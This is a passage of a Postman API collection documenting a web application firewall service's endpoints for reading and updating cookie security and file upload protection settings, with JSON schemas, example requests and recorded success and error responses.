GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"e96511e7-7acd-11e9-83f5-0bb6ecbdb2f6"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"Z-HGeFjEoAMFUgQ="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"},{"id":"8e8844a4-0280-4ca9-98a2-6d54309dc334","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/cookiesecurity","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","cookiesecurity"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The end point id."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 May 2019 07:16:07 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"233"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"22f5e563-7acf-11e9-a7bf-51b0e9db0d2d"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"Z-IYqF6XoAMFjxQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce25437-a6ce3cdc0b385f28181e38f6;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"_status\": \"disable\",\n        \"action\": \"alert_deny\",\n        \"CookieSecurity\": {\n            \"security-mode\": \"encrypted\",\n            \"http-only\": \"disable\",\n            \"secure-cookie\": \"disable\",\n            \"max-age\": 0,\n            \"cookie-replay-protection-type\": \"no\",\n            \"cookie-security-exception-list\": [\n                {\n                    \"cookie-name\": \"__utma\"\n                },\n                {\n                    \"cookie-name\": \"__utmb\"\n                },\n                {\n                    \"cookie-name\": \"__utmc\"\n                },\n                {\n                    \"cookie-name\": \"__utmz\"\n                },\n                {\n                    \"cookie-name\": \"__utmv\"\n                },\n                {\n                    \"cookie-name\": \"__utmx\"\n                },\n                {\n                    \"cookie-name\": \"__RequestVerificationToken\"\n                },\n                {\n                    \"cookie-name\": \"__RequestVerificationToken_Lw__\"\n                },\n                {\n                    \"cookie-name\": \"CoreID6\"\n                },\n                {\n                    \"cookie-name\": \"BDSVRTM\"\n                },\n                {\n                    \"cookie-name\": \"X-BackEndCookie\"\n                },\n                {\n                    \"cookie-name\": \"X-OWA-CANARY\"\n                },\n                {\n                    \"cookie-name\": \"ASPSESSIONID\"\n                },\n                {\n                    \"cookie-name\": \"PHPSESSID\"\n                },\n                {\n                    \"cookie-name\": \"JSESSIONID\"\n                },\n                {\n                    \"cookie-name\": \"ASP.NET_SessionId\"\n                },\n                {\n                    \"cookie-name\": \"adAuthCookie\"\n                },\n                {\n                    \"cookie-name\": \"unique2u\"\n                }\n            ],\n            \"allow-suspicious-cookies\": \"Always\"\n        }\n    }\n}"}],"_postman_id":"3b00e3d8-94ec-454a-b2a3-41051d9b5222"},{"name":"Update Cookie Security","id":"4c85a33e-6b83-4e38-b101-0f633f52e729","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"description":"<p>Token</p>\n","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n\n    \"_status\": \"enable\",\n    \"CookieSecurity\": {\n        \"security-mode\": \"encrypted\",\n        \"http-only\": \"enable\",\n        \"secure-cookie\": \"disable\",\n        \"max-age\": 0,\n        \"action\": \"alert_deny\",\n        \"cookie-replay-protection-type\": \"no\",\n        \"cookie-security-exception-list\": [{\n                \"cookie-name\": \"__utma\"\n         }],\n        \"allow-suspicious-cookies\": \"Always\"\n    }\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/cookiesecurity","description":"<p>Update the information about the Cookie Security.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"properties\": {\n\n        \"_status\": {\n            \"description\": \"Configure to enable or disable cookie security\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\",\n                \"disable\"\n            ],\n            \"default\": \"disable\"\n        },\n        \"action\": {\n            \"description\": \"The action when it detects a missing or incorrect cookie parameter\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"alert\",\n                \"alert_deny\",\n                \"block_period\",\n                \"deny_no_log\",\n                \"remove_cookie\",\n            ],\n            \"default\": \"alert_deny\"\n        },\n        \"CookieSecurity\": {\n               \"type\": \"object\",\n                 \"required\": [\"security-mode\", \"http-only\", \"secure-cookie\", \"max-age\", \"allow-suspicious-cookies\", \"cookie-replay-protection-type\"],\n            \"properties\": {\n                \"security-mode\": {\n                    \"description\": \"When cookie security is enabled, the cookie transmission is encrypted automatically\",\n                    \"type\": \"string\",\n                    \"enum\": [\n                        \"encrypted\",\n                        \"no\",\n                        \"signed\"\n                    ],\n                    \"default\": \"signed\"\n                },\n                \"http-only\": {\n                    \"description\": \"Configure to help prevent client-side scripts from accessing the cookie\",\n                    \"type\": \"string\",\n                    \"enum\": [\n                        \"enable\",\n                        \"disable\"\n                    ],\n                    \"default\": \"disable\"\n                },\n                \"secure-cookie\": {\n                    \"description\": \"Configure to force browser to only use the cookie for an HTTPS page\",\n                    \"type\": \"string\",\n                    \"enum\": [\n                        \"enable\",\n                        \"disable\"\n                    ],\n                    \"default\": \"disable\"\n                },\n                \"max-age\": {\n                    \"description\": \"The maximum age in minutes before cookie expires, input 0 for no expiry\",\n                    \"type\": \"integer\",\n                    \"minimum\": 0,\n                    \"maximum\": 65535,\n                    \"default\": 0\n                },\n                \"allow-suspicious-cookies\": {\n                    \"description\": \"Select whether TIM Host Protection allows requests that contain cookies that it does not recognize or that are missing cookies\",\n                    \"type\": \"string\",\n                    \"enum\": [\n                        \"Always\",\n                        \"Custom\",\n                        \"Never\"\n                    ],\n                    \"default\": \"Never\"\n                },\n                \"cookie-replay-protection-type\": {\n                    \"description\": \"Select whether TIM Host Protection uses the IP address of a request to determine the owner of the cookie\",\n                    \"type\": \"string\",\n                    \"enum\": [\n                        \"no\",\n                        \"IP\"\n                    ],\n                    \"default\": \"no\"\n                },\n                \"allow-time\": {\n                    \"description\": \"Set the date on which TIM Host Protection starts to take the specified action against suspicious cookies\",\n                    \"type\": \"string\",\n                    \"pattern\": \"(\\\\d{4}\\\\d{1,2}\\\\d{1,2})\",\n                },\n                \n                \"cookie-security-exception-list\": {\n                    \"type\": \"array\",\n                      \"required\": [\"cookie-name\"],\n                    \"maxItems\": 256,\n                    items: {\n                        \"type\": \"object\",\n                        \"properties\": {\n                            \"cookie-name\": {\n                                \"description\": \"The exception cookie entry name\",\n                                \"type\": \"string\",\n                                \"maxLength\": 63\n                            },\n                            \n                        }\n                    }\n                }\n            }\n        }\n    }\n}\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","cookiesecurity"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"4e4f6144-c968-48f7-a713-776da60b8dfe","name":"Parameter Invalid","originalRequest":{"method":"PUT","header":[{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n\n    \"_status\": \"enable\",\n    \"CookieSecurity\": {\n        \"security-mode\": \"invalid-mode\",\n        \"http-only\": \"enable\",\n        \"secure-cookie\": \"disable\",\n        \"max-age\": 0,\n        \"action\": \"alert_deny\",\n        \"cookie-replay-protection-type\": \"no\",\n        \"cookie-security-exception-list\": [{\n                \"cookie-name\": \"__utma\"\n         }],\n        \"allow-suspicious-cookies\": \"Always\"\n    }\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/cookiesecurity","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","cookiesecurity"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The endpoint id."}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 21 May 2019 02:37:52 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"69"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"6d9f2d89-7b71-11e9-918b-d1f25cae1878"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"aAyj4Ej5IAMF_OQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce3647f-8c3095f78ffc04b0a1ac1bc0;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Check failed: {'security-mode': \\\"Error enum type, only allow ['encrypted', 'no', 'signed']\\\"}\"\n}"},{"id":"c1a05d1f-b884-49c6-8bdb-42559321ff91","name":"Success","originalRequest":{"method":"PUT","header":[{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n\n    \"_status\": \"disable\",\n    \"CookieSecurity\": {\n        \"security-mode\": \"encrypted\",\n        \"http-only\": \"enable\",\n        \"secure-cookie\": \"disable\",\n        \"max-age\": 0,\n        \"action\": \"alert_deny\",\n        \"cookie-replay-protection-type\": \"no\",\n        \"cookie-security-exception-list\": [{\n                \"cookie-name\": \"__utma\"\n         }],\n        \"allow-suspicious-cookies\": \"Always\"\n    }\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/cookiesecurity","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","cookiesecurity"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The endpoint id."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 21 May 2019 02:36:41 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"26"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"4356226f-7b71-11e9-bf78-e7093f808c20"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"aAyYyG4aoAMF8AA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce36438-d59d6f38f1597dd0eaff4a74;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"},{"id":"f1b29fa4-d8b9-44fb-9450-ea09c81f9d88","name":"Fail","originalRequest":{"method":"PUT","header":[{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n\n    \"_status\": \"disable\",\n    \"CookieSecurity\": {\n        \"security-mode\": \"encrypted\",\n        \"http-only\": \"enable\",\n        \"secure-cookie\": \"disable\",\n        \"max-age\": 0,\n        \"action\": \"alert_deny\",\n        \"cookie-replay-protection-type\": \"no\",\n        \"cookie-security-exception-list\": [{\n                \"cookie-name\": \"__utma\"\n         }],\n        \"allow-suspicious-cookies\": \"Always\"\n    }\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/CookieSecurity11","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","CookieSecurity11"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The endpoint id."}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 21 May 2019 02:31:49 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"95eafe53-7b70-11e9-9df0-bf2e74ae9a1b"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"aAxrVF6XIAMFrXQ="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"}],"_postman_id":"4c85a33e-6b83-4e38-b101-0f633f52e729"},{"name":"Get File Protection","id":"8a4323e2-ea57-4dc2-977b-1d497b538ed5","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":""},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/fileprotection","description":"<p>Get the information of file protection configuration.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","fileprotection"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"3fe7780d-75a0-4ad7-9ee1-1dbacfc98824","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/file-protection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","file-protection"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The endpoint id."}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 24 May 2019 06:56:25 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"64"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"0c262f2a-7df1-11e9-89e9-b9b3f1c0a3fd"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"aLRP_FnGoAMF7zw="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce79599-d8eb750701c4dac9f808027e;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Unsupported method or error key 'file-protection'!\"\n}"},{"id":"86f2d0ff-41e8-44ca-99ba-2c847aee0c2e","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/fileprotection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","fileprotection"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The endpoint id."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 24 May 2019 06:54:25 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"3375"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"c4624c0e-7df0-11e9-8b81-655a552e4e90"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"aLQ9LEaAoAMF2gA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce79521-684f58ea60a5d6c09cbbd9ff;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"_status\": \"disable\",\n        \"action\": \"alert_deny\",\n        \"FileProtection\": {\n            \"trojan-detection\": \"disable\",\n            \"timsandbox-check\": \"disable\",\n            \"av-scan\": \"disable\"\n        },\n        \"FileUploadRule\": {\n            \"type\": \"Allow\",\n            \"file-size-limit\": 0,\n            \"request-file\": \"/\",\n            \"file-types\": []\n        },\n        \"candidate-file-types\": {\n            \"Picture Files\": {\n                \"00001\": \"GIF\",\n                \"00002\": \"JPG\",\n                \"00010\": \"BMP\",\n                \"00018\": \"PNG\",\n                \"00019\": \"TIFF/TIF\",\n                \"00023\": \"Windows Metafile Format(.wmf)\",\n                \"00024\": \"Corel Draw Picture\",\n                \"00028\": \"Windows Icon\",\n                \"00030\": \"Microsoft Document Image(.mdi)\",\n                \"00032\": \"Windows Enhanced Metafile(.emf)\",\n                \"00038\": \"Photoshop Image File(.psd)\",\n                \"00050\": \"JPEG-2000 Image File Format(.jp2)\",\n                \"00054\": \"Multipage PCX Bitmap File(.dcx)\"\n            },\n            \"Text Files\": {\n                \"00059\": \"XPS\",\n                \"00089\": \"TXT\",\n                \"00060\": \"Word(.docx)\",\n                \"00061\": \"Word Macro-Enabled(.docm)\",\n                \"00062\": \"Word Template(.dotx)\",\n                \"00063\": \"Word Macro-Enabled Template(.dotm)\",\n                \"00064\": \"Excel(.xlsx)\",\n                \"00065\": \"Excel Macro-Enabled(.xlsm)\",\n                \"00066\": \"Excel Template(.xltx)\",\n                \"00067\": \"Excel Macro-Enabled Template(.xltm)\",\n                \"00068\": \"Excel Add-In(.xlam)\",\n                \"00069\": \"PPT(.pptx)\",\n                \"00070\": \"PPT Macro-Enabled(.pptm)\",\n                \"00071\": \"PPT Template(.potx)\",\n                \"00072\": \"PPT Macro-Enabled Template(.potm)\",\n                \"00073\": \"PPT Add-In(.ppam)\",\n                \"00074\": \"PPT Show(.ppsx)\",\n                \"00075\": \"PPT Macro-Enabled Show(.ppsm)\",\n                \"00076\": \"Visio Drawing(.vsdx)\",\n                \"00077\": \"Visio Macro-Enabled Drawing(.vsdm)\",\n                \"00078\": \"Visio Stencil(.vssx)\",\n                \"00079\": \"Visio Macro-Enabled Stencil(.vssm)\",\n                \"00080\": \"Visio Template(.vstx)\",\n                \"00081\": \"Visio Macro-Enabled Template(.vstm)\",\n                \"00003\": \"PDF\",\n                \"00004\": \"XML\",\n                \"00021\": \"CHM\",\n                \"00022\": \"EXE\",\n                \"00026\": \"RTF\",\n                \"00036\": \"Windows Help File(.hlp)\",\n                \"00042\": \"Windows Mobile Note(.pwi)\",\n                \"00043\": \"Windows Registry Text(.reg)\",\n                \"00046\": \"SQL Server 2000 Database(.mdf)\",\n                \"00047\": \"Java Archive(.jar)\",\n                \"00048\": \"Windows Printer Spool File(.shd)\",\n                \"00049\": \"Windows Shortcut File(.lnk)\",\n                \"00051\": \"Quark Express Document(.qxd)\",\n                \"00053\": \"Windows MS Info File(.mof)\",\n                \"00055\": \"Microsoft Access Database(.MDB)\",\n                \"00056\": \"SPSS Data(.SAV)\",\n                \"00083\": \"RedHat Package Manager file(.RPM)\",\n                \"00082\": \"VMware Virtual Disk File(.vmdk)\",\n                \"00084\": \"Lotus WordPro document(.LWP)\",\n                \"00085\": \"Adobe encapsulated PostScript file(.EPS)\",\n                \"00086\": \"Lotus 1-2-3 spreadsheet(.WK)\",\n                \"00087\": \"SkinCrafter skin file(.skf)\",\n                \"00088\": \"Nero CD Compilation(.NRI)\",\n                \"00090\": \"Microsoft Office Word(.doc)\",\n                \"00091\": \"Microsoft Office Excel(.xls)\",\n                \"00092\": \"Microsoft Office PowerPoint(.ppt)\",\n                \"00093\": \"Hancom Office Hanword(.hwp)\"\n            },\n            \"Audio Files\": {\n                \"00005\": \"MP3\",\n                \"00006\": \"MIDI\",\n                \"00007\": \"WAVE\",\n                \"00031\": \"Apple CoreAudio(.caf)\",\n                \"00037\": \"Microsoft Advanced Streaming(.asf)\",\n                \"00039\": \"Real Audio File(.ra)\",\n                \"00044\": \"Apple Lossless Audio(.m4a)\",\n                \"00052\": \"Digital Speech Standard(.dss)\"\n            },\n            \"Video Files\": {\n                \"00011\": \"Real Media File(.rm)\",\n                \"00012\": \"MPEG v4\",\n                \"00013\": \"3GPP\",\n                \"00015\": \"AVI\",\n                \"00020\": \"Macromedia Flash\",\n                \"00035\": \"Windows Animated Cursor\",\n                \"00045\": \"DVD Video Movie File(.vob)\"\n            },\n            \"Compressed File\": {\n                \"00008\": \"RAR\",\n                \"00009\": \"ZIP\",\n                \"00017\": \"TAR\",\n                \"00025\": \"7-ZIP\",\n                \"00027\": \"Debian Package\",\n                \"00029\": \"Microsoft Cabinet File\",\n                \"00033\": \"Unix Archiver File(.ar)\",\n                \"00034\": \"Installshield Cabinet Archive Data\",\n                \"00040\": \"AIN Archive Data(.ain)\",\n                \"00041\": \"BZIP2 Archive(.bz2)\",\n                \"00057\": \"WinZIP ZIPX Archive(ZIPx)\",\n                \"00058\": \"Gzipped Tape Archive(TGZ)\"\n            }\n        }\n    }\n}"}],"_postman_id":"8a4323e2-ea57-4dc2-977b-1d497b538ed5"},{"name":"Update File Protection","id":"a6565b14-159c-4d0f-8b6a-6d3bd160d7c9","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"FileProtection\": {\n        \"trojan-detection\": \"enable\",\n        \"timsandbox-check\": \"disable\",\n        \"av-scan\": \"enable\"\n    },\n    \"FileUploadRule\": {\n        \"type\": \"Allow\",\n        \"file-size-limit\": 0,\n        \"request-file\": \"/\",\n        \"file-types\": [{\"file-type-name\": \"BMP\", \"file-type-id\": \"00010\"}]\n    }\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/fileprotection","description":"<p>Update the information about File Protection.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">\n{\n    \"type\": \"object\",\n    \"properties\": {\n        \"_status\": {\n            \"description\": \"Configure to enable or disable file protection\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"enable\",\n                \"disable\"\n            ],\n            \"default\": \"disable\"\n        },\n    \"action\": {\n        \"description\": \"The action when it detects uploading a harmful file\",\n        \"type\": \"string\",\n        \"enum\": [\n            \"alert\",\n            \"alert_deny\",\n            \"block_period\",\n            \"deny_no_log\",\n        ],\n        \"default\": \"alert_deny\"\n    },\n        \"FileProtection\": {\n            \"type\": \"object\",\n            \"required\": [\"trojan-detection\", \"av-scan\"],\n            \"properties\": {\n                \"trojan-detection\": {\n                    \"description\": \"Configure to detect Trojans in the uploaded files\",\n                    \"type\": \"string\",\n                    \"enum\": [\n                        \"enable\",\n                        \"disable\"\n                    ],\n                    \"default\": \"disable\"\n                },\n                \n                \"av-scan\": {\n                    \"description\": \"Configure to scan for viruses, malware, and greyware\",\n                    \"type\": \"string\",\n                    \"enum\": [\n                        \"enable\",\n                        \"disable\"\n                    ],\n                    \"default\": \"disable\"\n                },\n\n            }\n        },\n        \"FileUploadRule\": {\n            \"type\": \"object\",\n            \"required\": [\"type\", \"file-size-limit\", \"request-file\"],\n            \"properties\": {\n                \"type\": {\n                    \"description\": \"Configure to define the allowed and blocked file types\",\n                    \"type\": \"string\",\n                    \"enum\": [\n                        \"Allow\",\n                        \"Block\"\n                    ],\n                    \"default\": \"Block\"\n                },\n                \"file-size-limit\": {\n                    \"description\": \"Define the maximum allowed size for the file to upload\",\n                    \"type\": \"number\",\n                    \"minimum\": 0,\n                    \"maximum\": 102400\n                },\n                \"request-file\": {\n                    \"description\": \"Define the target URL that accepts the uploads\",\n                    \"type\": \"string\",\n                    \"pattern\": \".*\"\n                },\n                \n                \"file-types\": {\n                    \"type\": \"array\",\n                    \"required\": [\"file-type-name\", \"file-type-id\"],\n                    \"items\": {\n                        \"type\": \"object\",\n                        \"properties\": {\n                            \"file-type-name\": {\n                                \"type\": \"string\",\n                            },\n                            \"file-type-id\": {\n                                \"type\": \"string\",\n                            },\n                            \n                        }\n                    }\n                }\n            }\n        }\n    }\n}\n</code></pre>\n<p>The table below shows the keys and values of \"file-type-id\" and \"file-type-name\".</p>\n<table>\n  <tr>\n    <th>file-type-id</th>\n    <th>file-type-name</th>\n  </tr>\n  <tr>\n    <td>00001</td>\n    <td>GIF</td>\n  </tr>\n  <tr>\n    <td>00002</td>\n    <td>JPG</td>\n  </tr>\n  <tr>\n    <td>00010</td>\n    <td>BMP</td>\n  </tr>\n  \n<tr>\n    <td>00018</td>\n    <td>PNG</td>\n  </tr>\n<tr>\n    <td>00019</td>\n    <td>TIFF/TIF</td>\n  </tr>\n<tr>\n    <td>00023</td>\n    <td>Windows Metafile Format(.wmf)</td>\n  </tr>\n<tr>\n    <td>00024</td>\n    <td>Corel Draw Picture</td>\n  </tr>\n<tr>\n    <td>00028</td>\n    <td>Windows Icon</td>\n  </tr>\n<tr>\n    <td>00030</td>\n    <td>Microsoft Document Image(.mdi)</td>\n  </tr>\n<tr>\n    <td>00032</td>\n    <td>Windows Enhanced Metafile(.emf)</td>\n  </tr>\n<tr>\n    <td>00038</td>\n    <td>Photoshop Image File(.psd)</td>\n  </tr>\n<tr>\n    <td>00050</td>\n    <td>JPEG-2000 Image File Format(.jp2)</td>\n  </tr>\n<tr>\n    <td>00054</td>\n    <td>Multipage PCX Bitmap File(.dcx)</td>\n  </tr>\n<tr>\n    <td>00059</td>\n    <td>XPS</td>\n  </tr>\n<tr>\n    <td>00089</td>\n    <td>TXT</td>\n  </tr>\n<tr>\n    <td>00060</td>\n    <td>Word(.docx)</td>\n  </tr>\n<tr>\n    <td>00061</td>\n    <td>Word Macro-Enabled(.docm)</td>\n  </tr>\n<tr>\n    <td>00062</td>\n    <td>Word Template(.dotx)</td>\n  </tr>\n<tr>\n    <td>00063</td>\n    <td>Word Macro-Enabled Template(.dotm)</td>\n  </tr>\n<tr>\n    <td>00064</td>\n    <td>Excel(.xlsx)</td>\n  </tr>\n<tr>\n    <td>00065</td>\n    <td>Excel Macro-Enabled(.xlsm)</td>\n  </tr>\n<tr>\n    <td>00066</td>\n    <td>Excel Template(.xltx)</td>\n  </tr>\n<tr>\n    <td>00067</td>\n    <td>Excel Macro-Enabled Template(.xltm)</td>\n  </tr>\n<tr>\n    <td>00068</td>\n    <td>Excel Add-In(.xlam)</td>\n  </tr>\n<tr>\n    <td>00069</td>\n    <td>PPT(.pptx)</td>\n  </tr>\n<tr>\n    <td>00070</td>\n    <td>PPT Macro-Enabled(.pptm)</td>\n  </tr>\n<tr>\n    <td>00071</td>\n    <td>PPT Template(.potx)</td>\n  </tr>\n<tr>\n    <td>00072</td>\n    <td>PPT Macro-Enabled Template(.potm)</td>\n  </tr>\n<tr>\n    <td>00073</td>\n    <td>PPT Add-In(.ppam)</td>\n  </tr>\n<tr>\n    <td>00074</td>\n    <td>PPT Show(.ppsx)</td>\n  </tr>\n<tr>\n    <td>00075</td>\n    <td>PPT Macro-Enabled Show(.ppsm)</td>\n  </tr>\n<tr>\n    <td>00076</td>\n    <td>Visio Drawing(.vsdx)</td>\n  </tr>\n<tr>\n    <td>00077</td>\n    <td>Visio Macro-Enabled Drawing(.vsdm)</td>\n  </tr>\n<tr>\n    <td>00078</td>\n    <td>Visio Stencil(.vssx)</td>\n  </tr>\n<tr>\n    <td>00079</td>\n    <td>Visio Macro-Enabled Stencil(.vssm)</td>\n  </tr>\n<tr>\n    <td>00080</td>\n    <td>Visio Template(.vstx)</td>\n  </tr>\n<tr>\n    <td>00081</td>\n    <td>Visio Macro-Enabled Template(.vstm)</td>\n  </tr>\n<tr>\n    <td>00003</td>\n    <td>PDF</td>\n  </tr>\n<tr>\n    <td>00004</td>\n    <td>XML</td>\n  </tr>\n<tr>\n    <td>00021</td>\n    <td>CHM</td>\n  </tr>\n<tr>\n    <td>00022</td>\n    <td>EXE</td>\n  </tr>\n<tr>\n    <td>00026</td>\n    <td>RTF</td>\n  </tr>\n<tr>\n    <td>00036</td>\n    <td>Windows Help File(.hlp)</td>\n  </tr>\n<tr>\n    <td>00042</td>\n    <td>Windows Mobile Note(.pwi)</td>\n  </tr>\n<tr>\n    <td>00043</td>\n    <td>Windows Registry Text(.reg)</td>\n  </tr>\n<tr>\n    <td>00046</td>\n    <td>SQL Server 2000 Database(.mdf)</td>\n  </tr>\n<tr>\n    <td>00047</td>\n    <td>Java Archive(.jar)</td>\n  </tr>\n<tr>\n    <td>00048</td>\n    <td>Windows Printer Spool File(.shd)</td>\n  </tr>\n<tr>\n    <td>00049</td>\n    <td>Windows Shortcut File(.lnk)</td>\n  </tr>\n<tr>\n    <td>00051</td>\n    <td>Quark Express Document(.qxd)</td>\n  </tr>\n<tr>\n    <td>00053</td>\n    <td>Windows MS Info File(.mof)</td>\n  </tr>\n<tr>\n    <td>00055</td>\n    <td>Microsoft Access Database(.MDB)</td>\n  </tr>\n<tr>\n    <td>00056</td>\n    <td>SPSS Data(.SAV)</td>\n  </tr>\n<tr>\n    <td>00083</td>\n    <td>RedHat Package Manager file(.RPM)</td>\n  </tr>\n<tr>\n    <td>00082</td>\n    <td>VMware Virtual Disk File(.vmdk)</td>\n  </tr>\n<tr>\n    <td>00084</td>\n    <td>Lotus WordPro document(.LWP)</td>\n  </tr>\n<tr>\n    <td>00085</td>\n    <td>Adobe encapsulated PostScript file(.EPS)</td>\n  </tr>\n<tr>\n    <td>00086</td>\n    <td>Lotus 1-2-3 spreadsheet(.WK)</td>\n  </tr>\n<tr>\n    <td>00087</td>\n    <td>SkinCrafter skin file(.skf)</td>\n  </tr>\n<tr>\n    <td>00088</td>\n    <td>Nero CD Compilation(.NRI)</td>\n  